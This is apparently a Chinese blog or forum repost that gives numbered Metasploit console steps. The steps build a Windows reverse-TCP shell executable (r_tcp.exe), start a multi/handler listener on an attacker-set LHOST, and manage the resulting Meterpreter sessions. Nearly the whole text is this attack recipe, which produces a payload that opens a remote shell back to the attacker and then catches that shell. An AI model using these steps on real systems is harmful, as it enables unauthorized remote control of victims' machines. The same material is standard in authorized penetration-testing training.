1. msfconsole

 

2. show payloads 

 

3. use windows/shell/reverse_tcp

 

4. show options

 

5. set LHOST 192.168.x.x

 

6. generate -h

 

7. generate -f r_tcp.exe -t exe

 

8. use exploit/multi/handler

 

9. use  windows/shell/reverse_tcp   (2) windows/meterpreter_reverse_tcp

 

10. show options 

 

11. set LHOST 192.168.x.x

 

12. exploit 

 

 

 

 

Meterprefer 使用 

1. background 挂入后台session

2. sessions 查看现有的后台  session

3. sessions -i 1 查看后台session id为1

 

 

[原创]

 https://bbs.ichunqiu.com/thread-17990-1-1.html?from=bbsrt1

 

相关文章:

  • 2021-10-31
  • 2021-04-07
  • 2021-11-30
  • 2021-07-27
  • 2022-01-15
  • 2022-12-23
  • 2022-12-23
  • 2021-06-17
猜你喜欢
  • 2021-05-13
  • 2021-12-30
  • 2021-12-03
  • 2022-01-09
  • 2021-07-09
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案